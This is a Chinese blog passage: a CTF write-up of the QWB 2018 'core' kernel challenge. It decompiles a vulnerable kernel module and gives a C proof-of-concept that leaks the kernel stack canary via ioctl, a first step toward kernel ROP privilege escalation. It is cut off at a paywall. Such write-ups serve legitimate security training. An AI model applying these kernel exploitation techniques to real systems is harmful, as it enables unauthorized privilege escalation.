ctf中linux 内核态的漏洞挖掘与利用系列

最新推荐文章于 2024-04-01 17:04:41 发布
最新推荐文章于 2024-04-01 17:04:41 发布
阅读量880 收藏 2
点赞数
文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Moyun_vackbot/article/details/123820337
版权

qwb2018 core

题目链接:https://pan.baidu.com/s/10te2a1LTZCiNi19_MzGmJg 密码:ldiy

解压官方给的tar包,可以看到如下4个文件:

其中start.sh是qemu的启动脚本,这里将-m参数修改为512M,否则本地无法正常启动,同时为了便于调试,需要解包core.cpio并修改其中的init文件,将poweroff的指令删除,让内核不在定时关闭。init文件内容如下:

#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2 
insmod /core.ko
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

基本可以确认存在漏洞的模块为core.ko,而开启的kptr_restrictdmesg_restrict则缓解了内核信息的泄露,卸载了/proc/sys这两个目录,进一步阻止用户查看内核信息。查看start.sh可知内核开启了kaslr。注意到cat /proc/kallsyms > /tmp/kallsyms这条命令,相当于可以从/tmp/kallsyms读取部分内核符号信息,这样便于后面编写提权的shellcode。

解包core.cpio后,查看core.ko开启的防护如下:

gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : disabled

开启了NX以及stack canary,利用ghidra打开core.ko,查看它的函数如下:

初始化函数如下:

undefined8 init_module(void)
{
  core_proc = proc_create(&DAT_001002fd,0x1b6,0,core_fops);
  printk(&DAT_00100302);
  return 0;
}

其中core_fops是内核的file_operations结构,跟进去查看发现其实现了自定义的writeioctlrelease函数,其中ioctl函数内部调用了core_readcore_copy_func等功能,如下:

undefined8 core_ioctl(undefined8 param_1,int param_2,ulong param_3)
{
  if (param_2 == 0x6677889b) {
    core_read(param_3);
  }
  else {
    if (param_2 == 0x6677889c) {
      printk(&DAT_001002f1,param_3);
      off = param_3;
    }
    else {
      if (param_2 == 0x6677889a) {
        printk(&DAT_001002d7);
        core_copy_func(param_3);
      }
    }
  }
  return 0;
}

这里由于之前开启的内核策略导致printfk输出的内容无法通过dmesg获取,查看core_read函数如下:

void core_read(undefined8 param_1)

{
  long lVar1;
  undefined4 *puVar2;
  long in_GS_OFFSET;
  byte bVar3;
  undefined4 auStack80 [16];
  long local_10;

  bVar3 = 0;
  local_10 = *(long *)(in_GS_OFFSET + 0x28);
  printk(&DAT_0010027f);
  printk(&DAT_00100299,off,param_1);
  lVar1 = 0x10;
  puVar2 = auStack80;
  while (lVar1 != 0) {
    lVar1 = lVar1 + -1;
    *puVar2 = 0;
    puVar2 = puVar2 + (ulong)bVar3 * -2 + 1;
  }
  strcpy((char *)auStack80,"Welcome to the QWB CTF challenge.\n");
  lVar1 = _copy_to_user(param_1,(long)auStack80 + off,0x40);//全局变量off可控
  if (lVar1 != 0) {
    swapgs();
    return;
  }
  if (local_10 != *(long *)(in_GS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

由于可以通过ioctl控制off这个全局变量,因此可以控制返回给用户的内容为内核栈上特定偏移的数据,这里可以用来泄露栈cookie值,通过如下代码可以打印泄露的cookie以及函数返回地址:

#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <fcntl.h>
int main(int argc,char* argv[])
{
    int fd1 = open("/proc/core",O_RDWR);
    unsigned long long buf[0x1000];
    memset(buf,'a',0x200);
    int off=0;
    if(argc>1)
    {
        off=strtol(argv[1],NULL,10);
    }
    printf("fd is %d\n",fd1);
    ioctl(fd1,0x6677889C,off);
    ioctl(fd1,0x6677889B,buf);
    for(int i =0;i<4;i++)
    {
        for(int m=0;m<4;m++)
        {
            printf("%016llx ",buf[i*4+m]);
        }
        printf("\n");
    }
    return 0;

}

结果如下:

/ $ ./poc 64
fd is 3
5d2043a60145af00 00007ffe2b41ecf0 ffffffffc03cc19b ffff96afda3efe40 
ffffffffa19dd6d1 000000000000889b ffff96afdf80fb00 ffffffffa198ecfa 
6161616161616161 6161616161616161 6161616161616161 6161616161616161

此时的5d2043a60145af00即为当前内核栈上的cookie值,可用来后续的内核rop。查看core_write函数:

undefined  [16] core_write(undefined8 param_1,undefined8 param_2,ulong param_3)
{
  ulong uVar1;
  long lVar2;

  printk(&DAT_00100239);
  if (param_3 < 0x801) {
    lVar2 = _copy_from_user(name,param_2,param_3);
    if (lVar2 == 0) {
      uVar1 = param_3 & 0xffffffff;
      goto LAB_00100084;
    }
  }
  printk(&DAT_00100254);
  uVar1 = 0xfffffff2;
LAB_00100084:
  return CONCAT88(param_2,uVar1);
}

这里可以控制name全局变量的内容。查看core_copy_func函数,如下:

undefined8 core_copy_func(ulong param_1)
{
  undefined8 uVar1;
  ulong uVar2;
  undefined1 *puVar3;
  undefined *puVar4;
  long in_GS_OFFSET;
  byte bVar5;
  undefined auStack80 [64];
  long local_10;

  bVar5 = 0;
  local_10 = *(long *)(in_GS_OFFSET + 0x28);
  printk(&DAT_00100239);
  if ((long)param_1 < 0x40) {
    uVar2 = param_1 & 0xffff;
    uVar1 = 0;
    puVar3 = name;
    puVar4 = auStack80;
    while (uVar2 != 0) {
      uVar2 = uVar2 - 1;
      *puVar4 = *puVar3;
      puVar3 = puVar3 + (ulong)bVar5 * -2 + 1;
      puVar4 = puVar4 + (ulong)bVar5 * -2 + 1;
    }
  }
  else {
    printk(&DAT_001002c5);
    uVar1 = 0xffffffff;
  }
  if (local_10 == *(long *)(in_GS_
最低0.47元/天 解锁文章
墨云安全
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctflinux内核漏洞挖掘利用系列(一)
老司机的后备箱
08-10 398
系列文章主要是从ctf比赛入手,针对linux内核上的漏洞分析、挖掘与利用做讲解,本篇文章主要介绍内核漏洞利用所需的前置知识以及准备工作。
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
嵌入式开启initramfs
zf1575192187的专栏
04-02 498
mkdir rootfs cd rootfs mkdir bin dev etc lib proc sbin sys usr mnt tmp var mkdir usr/bin usr/lib usr/sbin lib/modules cd  rootfs/dev mknod -m 666 console c 5 1  //一定需要手动创建,要不然切换到根文件系统,无...
CTF-pwn 技术总结,二进制漏洞挖掘---安全机制绕过
最新发布
键盘的起始页
04-01 409
学习linux pwn,linux安全机制的知识是绕不开的。如果能理解这些安全机制的原理以及不懂得如何绕过它们,那么在比赛时将你举步维艰,本节我就总结了所有linux安全机制的基本原理以及具体的绕过方法,希望能帮助一些小萌新更快入门,帮助需要进阶的朋友打好根基。
Ingenic工作记录
基建工时福贵
08-27 197
系统默认没有/dev/bus/usb目录 经过一番研究需要手动执行一下 mount -t devtmpfs none /dev 但是从内核的配置来看,已经配置了自动挂载,所以不是很清楚到底原因是什么??? 对应的宏 DEVTMPFS_MOUNT ...
linux kernel pwn 劫持tty结构体 打不开/dev/ptmx文件(二)
yongbaoii的博客
04-20 783
前文 一
命令执行漏洞—CTFSHOW(简单利用
weixin_44431280的博客
03-05 1355
命令执行漏洞—CTFSHOW(简单利用) 远程命令执行简介和原理可以参考文章Web安全—远程命令/代码执行(RCE) 远程命令执行1: 1,题目简介分析 代码分析:$_GET()函数读取URL传过来的C参数和值,然后使用preg_match函数判断传过来的参数值是否包含flag值(用来对传入的参数值进行过滤),然后使用eval()函数执行C参数传过来的值。 2,思路分析 通过信息收集判断网站操作系统类型,然后通过参数传入值执行操作系统命令,因为未对参数值进行限制,所以此处存在命令执行和代码执行漏洞 通过
pwntools:CTF框架和漏洞利用开发库
02-04
Pwntools是一个CTF框架和漏洞利用开发库。 它是用Python编写的,旨在用于快速原型开发和开发,旨在使漏洞利用程序编写尽可能简单。 from pwn import * context ( arch = 'i386' , os = 'linux' ) r = remote ( '...
用于深度测试和CTFLinux枚举工具-Linux开发
05-27
首先,几个有用的oneliners;)wget“ ... 首先,几个有用的oneliners;... chmod 700 lse.sh linux-smart-enumeration用于渗透测试和CTFLinux枚举
flagchecker:在比赛进行有效的作弊检测。 利用Linux内核模块(LKM)生成标志
05-17
标志检查器对CTF /比赛的有效作弊检测。 随时提交PR。 这个想法的灵感来自韩国国内CTF比赛“标记的生成方式。 我决定从头开始创建它。 该模块已在4.15、4.19、5.8、5.11上进行了测试。目录结构 .├── docs: For ...
CTF的其他漏洞1
08-03
脏牛漏洞就是一个典型的例子,它利用内核的竞争条件,使得攻击者可以越权访问文件系统。 3. **代码逻辑漏洞**: 代码逻辑漏洞是由于编程错误导致的,比如比较操作符的误用、边界条件检查不全等。这些错误可能...
DestructiveFarm:manager攻击防御CTF竞赛的漏洞利用管理器
04-29
破坏性农场语言:英语| 利用农场进行攻击性CTF竞赛 如果您想了解什么是防御攻击的CTF,为何需要此漏洞利用场以及为何具有以下描述的体系结构,请阅读 。组件漏洞利用是从其他团队的某些服务窃取标志的脚本。 它是...
PHP<=7.4.21 Development Server源码泄露漏洞
这周末在做梦的博客
03-05 3474
因为特殊的原因CTF荒废了一段时间,近期总算再次捡了起来,算是从头开始了吧。近期比赛刚好遇到了这个漏洞,看国内似乎还没有过多的论述,先总结一波。
linux汇编建文件,linux汇编学习(6)---添加根文件系统
weixin_39772652的博客
04-29 145
【完整代码 https://github.com/linzhanglong/mini_bootloader 】现在我们开始添加一个文件系统。如何引导文件系统呢?一个古老的方法就是通过命令函数。bootloader传给内核 root=xxxx,然后由内核去加载这个分区,然后执行里面的文件,这个有个问题就是这个分区可能是外置存储,或者其他各种各样的存储。这样就有一个问题就是内核需要有对应的驱动去...
漏洞扫描 CTF
m0_68249386的博客
04-29 415
目录 文章目录目录一、基础知识1.CTF简介2.竞赛模式3.比赛形式4.题目类型二、web 信息泄露1.目录遍历2.PHPINFO3.备份文件下载3.1 网站源码3.2 bak文件3.3 vim缓存3.4 .DS_Store 一、基础知识 1.CTF简介 步骤 1.登录CTFHub—>技能树---->基础知识 2.CTF简介---->开启题目---->题目附件---->复制FLAG粘贴---->提交 2.竞赛模式 步骤 1.竞赛模式---->开启题目---
CTF比赛解析备课与教学:漏洞扫描
lm19770429的专栏
08-25 504
发现弱点 • 发现漏洞 • 基于端口服务扫描结果版本信息(速度慢) • 搜索已公开的漏洞数据库(数量大) • 使用弱点扫描器实现漏洞管理 在线查找漏洞代码kali:https://www.exploit-db.com/
pwn学:从入门到入狱
weixin_43922904的博客
05-01 49
然后我们就可以溢出它(向一个区域写的数据比它能容纳的多,所以它溢出并开始覆盖内存的后续内容),用0xdea110c8覆盖local_18。因此,如果我们能使用gets调用将local_18的内容覆盖到0xdea110c8,我们就应该得到flag(如果你在本地运行这个程序,你需要有一份与二进制文件pwn1在同一目录下的flag.txt的副本)。所以我们可以看到,它将local_18的内容与0xdea110c8进行比较,如果相等(这意味着它是0),它就会调用print_flag函数。第一次它检查的是 ”
CTFlinux基本命令
m0_62102520的博客
06-23 392
1.
CTF(capture the flaga)程序逆向漏洞挖掘WEB渗透攻略加密解密数据隐藏远程利用各类编程
02-07
"CTF(capture the flag)程序逆向漏洞挖掘WEB渗透攻略加密解密数据隐藏远程利用各类编程" 在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,旨在检验参赛者的技能,涵盖范围广泛,包括但不限于程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值